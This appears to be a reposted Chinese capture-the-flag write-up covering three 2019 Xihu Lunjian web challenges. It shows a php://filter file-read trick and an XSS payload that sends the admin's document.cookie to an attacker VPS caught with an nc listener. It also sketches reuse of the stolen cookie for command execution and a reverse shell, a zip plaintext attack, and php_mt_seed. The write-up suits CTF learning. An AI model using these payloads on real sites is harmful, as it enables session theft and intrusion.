2019西湖论剑web wp

发在正文前

这应该是自己在安全圈摸爬滚打两年多以来第一次正规的ctf比赛。没解出flag,没截图,只提供了一些思路。

遥想往昔,初入大学,带着对PT的向往,一个人穿行在幽暗的图书馆,翻阅啃读一本本安全书籍(后来事实证明,纯属瞎折腾。在此也表达下对那些无师自通的大??深深的佩服之情),也从网上收集各种pt资源,弃高数而不学,视线代为无物,弱水三千唯爱我PT,虽晦涩难懂,学习过程举步维艰,仍然孜孜不倦,越发寻不得,就越发令我向往,言之痴迷不过。

兜兜转转,踏上起点,已是大二之事,没有多少窃喜,相反偶尔徒生黄花菜已凉之感,古人云:诗酒趁年华,搞事要趁早。但我好像就像一只被岁月风干理想的咸鱼(但也是一只不放弃挣扎的咸鱼),最黯然莫过于在pt的路上踽踽独行,偏离了大众的道路,与众生相悖而驰,更未曾看见想象中的美妙风景。但,老班长说过,“**就在眼前,梦想呢?也许在更前面一点。”我期待的精彩的世界,也许就在更前面一点,我期待的小伙伴,也许就在更前面一点。自己要用技术做出一番有意义的事情的愿景会一直保留,万一哪一天就实现了?

言归正传,承蒙学长辰厚重

,让我得以完美打了一次酱油,在协会众人的不懈努力下,最终还是没进入决赛,拿了个66大吉。

自己给自己颁发一个ctfer的证书,之后的事,当然就是在ctfer圈风生水起,打下一片天地啦。○( ^皿^)っHiahiahia…

正文

babyt3(300)

说真,这题的难度本菜觉得与分值不符,差评。(然后大佬就说了:应该是出了非预期Bug)

打开链接,在正中处赫然看见

迫不及待告诉学长,说完之后立马觉得自己傻Ⅹ。

读取源码:/?file=php://filter/read=convert.base64-encode/resource=index.php

继续:/?file=php://filter/read=convert.base64-encode/resource=dir.php

查看根目录:/dir.php?dir=/

太明显了叭:/?file=php://filter/read=convert.base64-encode/resource=/ffffflag_1s_Her4

得到flag

ps:

昨天看见一个大佬的博客,预期解应该是,第一步.DS_Store文件泄露。

breakout(300)

此题可分为拿cookie和利用cookie两部分。

拿cookie

打开链接

message:

想了一下留言板处会出现的漏洞,最常见xss,sql注入

简单fuzz:<script>....。直接被过滤了,有点此地无银三百两,这不是提醒我这就是xss吗?

于是fuzz一通,过滤了<>里的内容和<>里的on事件,unicode可行,不知道啥用,于是跳到report。

report:

由于不知道第一个框框干嘛的,就先解决第二个框框,md5截断比较,网上有脚本。

再填写第一个框框的时候,随便填写,提示说不是它的网址,还是不知道干嘛的,跳到exec。

exec:

命令执行,但需要管理权限。

至此知道了message和url是干嘛的了,xss打管理cookie。

回到message,留言:<iframe src="javascript:window.location.href=‘http://vps:7777/?a=‘+document.cookie"

回到report,url填写:http://ctf1.linkedbyx.com:10441/main.php

vps上监听:nc -lvvp 7777

ok!拿到cookie:balabala

利用cookie

改本地cookie,执行命令,没有“非管理”的提示了,说明权限认证成功,但没显示。在我正在怀疑思路是否正确之际,学长肯定地说,命令执行了,只是没显示。

好吧,学习了。

然后问了一下学长:

果然就是,关于反弹shell就不多谈了,看这篇文章,至此flag到手。

在网上看见有人用了卡外带的方法,卡外带我也想到并试了,大概是姿势不对,妈蛋,吃了经验的亏!

猜猜flag是什么(300)

打开链接

一开始疯狂sql注入,后来临近崩溃才向学长求助。

学长提示

fo了!

网上随便找个工具打开,打开后

访问flag,提示没那容易得到flag,显然还需要通过别的操作.

至此直到game over也思路全无。

接着膜大佬的wp

用githack获得一个压缩包BackupForMySite.zip

用明文攻击解开压缩包,得到里面的code

之后去主页面提交:

/?code=你找到的code

给了一个随机数。
使用php_mt_seed

$ time ./php_mt_seed 你的随机数

得到数字依次访问:

/flag/得到的数字.txt

得flag

打开链接,啥都木有,然后就...没思路了。,,???,,

原文地址:https://www.cnblogs.com/p0pl4r/p/10693507.html

时间: 2024-10-08 15:14:43

2019西湖论剑web wp的相关文章

2019西湖论剑网络安全技能大赛(大学生组)部分WriteUp

这次比赛是我参加以来成绩最好的一次,这离不开我们的小团队中任何一个人的努力,熬了一整天才答完题,差点饿死在工作室(门卫大爷出去散步,把大门锁了出不去,还好学弟提了几个盒饭用网线从窗户钓上来才吃到了午饭).写好WP回到宿舍的时候已经快十二点了,随便吃了点面包倒头就睡...... 接下来大概写写我们的解题思路,由于做题的时候没想到可以进名次,而且赛后比赛平台也关了,所以很多实现过程的截图就没法弄了,只下了除web以外的题目. CRYPTO 第一题 HardGame 这道题我们并没有做出来,可以看看大

2019千锋Web前端拉勾网项目实战

课程目录:01-拉勾网项目实战02-拉勾网项目实战03-拉勾网项目实战04-拉勾网项目实战05-拉勾网项目实战06-拉钩网项目实战07-拉勾网项目实战08-拉勾网项目实战09-拉勾网项目实战10-拉勾网项目实战11-拉勾网项目实战12-拉勾网项目实战13-拉勾网项目实战14-拉勾网项目实战15-拉勾网项目实战16-拉勾网项目实战17-拉钩网项目实战18-拉钩网项目实战19-拉钩网项目实战20-拉钩网项目实战21-拉钩网项目实战22-拉钩网项目实战23-拉钩网项目实战24-拉钩网项目实战 下载地址

2019千锋Web前端幸福西饼整站项目实战

课程目录:├─剪辑视频│      code.rar│      第1集 幸福西饼页面01.mp4│      第2集 幸福西饼页面02.mp4│      第3集 幸福西饼页面03.mp4│      第4集 幸福西饼页面04.mp4│      第5集 幸福西饼页面05.mp4│      第6集 幸福西饼页面06.mp4│      └─原视频        01幸福西饼页面.mp4        02幸福西饼页面.mp4        03幸福西饼页面.mp4        04幸福西饼

2019年下半年Web前端开发初级理论考试

2019年下半年         Web前端开发初级       理论考试 (考试时间9:00-11:30 共150分钟) 1. 本试卷共3道大题,满分100分. 2. 请在指定位置作答. 一.单选题(每小题2分,共30小题,共60分) 1.在HTML中,(    )用来表示特殊字符引号 A.&reg            B.&copy             C.&quot            D.&nbsp 2.下面关于文件路径的说法错误的是(  ). A.“../

2019 安恒周周练西湖论剑特别版 pwn部分wp

pwn1 考点:构造 shellcode,patch 汇编指令 IDA 查看反汇编,程序的逻辑很简单如,如果 直接 f5 的话 IDA 可能识别不出来函数,问题出在 0x080484CF 这个地方,call eax 指令识别不出来,所以这里可以先 patch 成 nop,之后 f5 就正常了. 程序把输入当成 shellcode 直接来执行,很显然是直接往栈上写 shellcode 了.checksec 检查保护的时候也可以验证这一点. gdb-peda$ checksec CANARY : d

西湖论剑WP

先水几句,这次的题确实难啊,动用了洪荒自力,第一名的神仙也没有全部做完. 官方说这次的题目有两道没被做出来,我猜应该是PWN和RE吧 本来我们是45名的,最后5分钟那帮人啊,硬生生给我们挤出前50,我都想砸电脑了, 后来官方又说前65名成功获得参赛资格,我去!又活了,但是无奈前50只刷掉几个队伍, 还是很遗憾没有进线下赛,本菜鸡尽力了,唉,下面进入正题 一.奇怪的TTL字段 TTL了解一下:TTL是 Time To Live的缩写,该字段指定IP包被路由器丢弃之前允许通过的最大网段数量.TTL是

到处抄来的SUCTF2019 web wp

0x01 EasySQL 这是一个考察堆叠注入的题目,但是这道题因为作者的过滤不够完全所以存在非预期解 非预期解 直接构造 *,1 这样构造,最后拼接的查询语句就变成了 select *,1||flag from Flag,可以直接得到当前表中的全部内容,就能够直接获得flag 正常解题 堆叠注入,先构造 1;show tables;#可以得到当前的表信息 并且根据回显,我们可以大致判断查询语句为: ... POST['query']||flag ... 直接构造 1;select * from

SWPUCTF 2019总结以及部分WP

本次SWPUCTF开赛了,一共做了5个misc+2个web,RE和Android没时间看= =,pwn完全不会,果然又是和去年一样划水.题目都出的很不错,做题的时候思路其实也容易想到,剩下几个web有思路但是最后还是没有做出来. 简单写个WP吧. 本次比赛的部分文件我已保存上传至xxx.懒得上传,需要的话找我拿吧. 一.MISC 神奇的二维码 下载之后是一个二维码,直接扫描后是一个fakeflag,直接binwalk先扫描一波 可以发现里面有几个rar,将其分离出来,其中两个rar解出来都是没有

演讲稿分析:2001年西湖论剑:向网络要钱

马云: 谢谢各位首先代表杭州IT界的企业,为各位的光临表示衷心的感谢. 其实这一年变化很多,我觉得变化是必然的,互联网我觉得最大的特征就是变化,阿里巴巴是怀抱变换拥抱变化,而且处在不断的变化之中. 那去年一年呢,应该是说,我觉得我们上一次论剑以后,总结了这走过的两三年,我们犯了很多很多的错误,真的,有些错误是刻骨铭心的痛,我自己感觉痛定思痛,上一次论剑回来让我想,阿里巴巴需要练什么样的剑,练什么样的招,才能够躲过后面更加复杂的形式,后来我们说我们不练剑,不练招而我们练阵(想法:公司构建生态系统的